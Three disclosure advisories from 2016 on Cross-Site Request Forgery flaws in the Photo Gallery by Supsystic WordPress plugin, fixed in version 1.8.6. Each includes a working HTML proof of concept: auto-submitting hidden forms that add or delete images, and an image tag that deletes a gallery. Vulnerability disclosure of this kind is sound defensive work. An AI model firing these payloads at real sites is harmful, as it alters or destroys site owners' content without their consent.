------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
adding of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to add images to a gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_adding_of_images.html

This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to add images to a gallery. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept

<html>
   <body>
      <form method="post" action="http://<target>/wp-admin/admin-ajax.php">
         <input type="hidden" name="action" value="grid-gallery">
         <input type="hidden" name="galleryId" value="5">
         <input type="hidden" name="attachType" value="gallery">
         <input type="hidden" name="folder_id" value="0">
         <input type="hidden" name="attachment_id" value="10">
         <input type="hidden" name="route[module]" value="photos">
         <input type="hidden" name="route[action]" value="add">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>


------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of galleries
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary gallleries.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_galleries.html

This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to delete arbitrary gallleries. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept

<html>
   <body>
      <img src="http://<target>/wp-admin/admin.php?page=supsystic-gallery&module=galleries&action=delete&gallery_id=10 ">
   </body>
</html>

------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary images from the Photo Gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_images.html

This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to delete images from an existing gallery. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept

<html>
   <body>
      <form method="post" action="http://192.168.1.18/wp-admin/admin-ajax.php">
         <input type="hidden" name="action" value="grid-gallery">
         <input type="hidden" name="gallery_id" value="2">
         <input type="hidden" name="ids[]" value="5">
         <input type="hidden" name="ids[]" value="7">
         <input type="hidden" name="route[module]" value="galleries">
         <input type="hidden" name="route[action]" value="deleteResource">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>